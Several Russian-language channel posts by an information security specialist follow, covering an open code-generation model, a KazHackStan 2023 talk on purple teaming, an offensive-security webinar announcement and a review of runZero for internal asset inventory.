Большие языковые модели - это нейросети, использующие алгоритмы машинного обучения, позволяющие обобщать, прогнозировать, генерировать человеческие языки на основе больших наборов текстовых данных. Принцип работы таких моделей основан на определении вероятностного сочетания слов и их значений в заданном контексте с использованием определенных алгоритмов вычислений.

В современном мире пожалуй не осталось людей не слышавших об этих достижениях инженерной мысли и не пытавшихся делегировать свою работу ChatGPT, BERT, YandexGPT, Midjourney, Kandinsky и прочим. Эти нейросети отвечают на любые вопросы, пишут статьи и курсовые работы, создают маркетинговые материалы и презентации, сочиняют стихи и рисуют иллюстрации и многое другое с каждым шагом приближая skynet светлое будущее. Единственное, что до недавнего времени было за гранью возможностей бездушной машины - это написание кода на уровне хорошего программиста.

В прошлом месяце, специалисты одной популярной соц сети выложили в открытый доступ веса модели которая умеет в код на Python, C++, C#, Java, PHP, Typescript (Javascript) и пр. на уровне профессионального разработчика. Пишет подробные комментарии и предлагает различные варианты решения с детальными пояснениями, а главное старается максимально исключить любые проблемы безопасности на этапе разработки.

Чтобы сэкономить время для тех кому интересно попробовать самостоятельно, я залил веса (~300Gb) на https://disk.yandex.ru/d/GO3sYCN6LngiOQ Необходимо хорошее железо и много RAM, инструкции как заставить это чудо работать можно найти в репозитории.
А для тех кто не хочет заморачиваться или ждет quantization версию этих моделей, можно оценить потенциал CodeLlama на https://huggingface.co/chat/

Читать полностью…

На KazHackStan 2023 я рассказывал про Purple Teaming🟣

Это относительно новый формат для рынка услуг ИБ в России, но по моему мнению он обладает очень большим потенциалом, так как обеспечивает возможность не только оценить текущий уровень защищенности, а еще и построить эффективные процессы обнаружения, реагирования и противодействия киберугрозам.

Презентация доклада Purple Teaming - Взаимодействие, а не противодействие доступна по ссылке
Запись будет доступна на следующей неделе, а пока вот несколько кружочков и фоточек с моего выступления😊

Читать полностью…

Программа конференции KazHackStan уже доступна на сайте: https://kazhackstan.com/schedule.

Мой доклад Purple Teaming - Взаимодействие, а не противодействие запланирован на 14 сентября 11:00 - 11:45 (UTC +6)

Буду очень рад увидеться со всеми кто планирует посетить самую крутую конференцию по кибербезопасности
в Центральной Азии. До встречи на KazHackStan 2023!

Дата: 13-15 сентября 2023 г.
📍 Место: Q-lab, пр. Абая 90, Алматы

Читать полностью…

Лучшие практики наступательной безопасности (Offensive Security)

06 сентября 2023 - 11:00

В прямом эфире AM Live вместе с ведущими экспертами обсудим наступательную или атакующую безопасность (Offensive Security - OffSec). Что это такое и почему к этому подразделу информационной безопасности приковано столько внимания?

🔸 Какие можно выделить уровни зрелости OffSec в организации?
🔸 Почему недостаточно проводить периодические пентесты силами “лучших белых хакеров”?
🔸 Как традиционной команде защитников Blue Team правильно работать с результатами анализа защищенности?
🔸 Как безопасникам научиться работать в спарринге в формате Purple Team?
🔸 Как комбинировать пентесты, Red Teaming и Bug Bounty?
🔸 Насколько в реальной практике правильно выстроенный процесс OffSec снижает риски информационной безопасности?
🔸 Какие методы чаще всего применяются в рамках процесса OffSec?

Зарегистрироваться, чтобы задать вопросы экспертам: https://live.anti-malware.ru/am-live/red-teaming-vs-bug-bounty/#reg

Читать полностью…

Мы уже не однократно обсуждали ASM решения для внешнего периметра, предлагаю сегодня немного поговорить про инвентаризацию активов во внутренней сети.

Несмотря на понимание очевидной необходимости проводить регулярное сканирование внутреннего периметра и инвентаризацию активов на инфраструктуре облачных провайдеров, чтобы всегда иметь актуальную информацию и в целом понимание что там происходит, хотя бы в части биллинга. На практике многие заказчики просто игнорируют эту необходимость, особенно консерваторы придерживающиеся концепции враг не пройдет обеспечения безопасности только внешнего периметра, устаревшей с приходом облаков и COVID. Причина в том, что просто лень это довольно сложно автоматизировать собственными силами, а готовых коммерческих решений на рынке очень мало.

Пример такого решения - runZero (ex Rumble) от уважаемого HD Moore. По архитектуре это - проприетарный сканер в виде агента на go, развернутый внутри сети и/или API интеграция с облачными провайдерами и агентами других решений (EDR, MDM и пр). И облачная платформа в веб-интерфейсе, куда заливаются результаты сканирований для идентификации ОС, портов, сервисов, сетевых интерфейсов и многого другого, позволяющая управлять агентами, запускать сканирования по расписанию, дифать итерации сканирований, присылать алерты при появлении новых хостов/сервисов и прочее.

Одним из ключевых преимуществ этого решения является огромное кол-во полезной информации собираемой о сканируемых хостах и подсетях, высокая точность определения сервисов, скриншоты вебчика, большая база фингерпринтов OT и IoT устройств и многое другое. К недостаткам можно отнести реализацию в формате self-hosted решения только на дорогих уровнях подписки. Я уже несколько лет использую это решение для сканирования домашней сети на бесплатном уровне подписки с целью инвентаризации и контроля зоопарка IoT устройств.

#runzero #attack_surface_management #asset_discovery #asset_inventory

Читать полностью…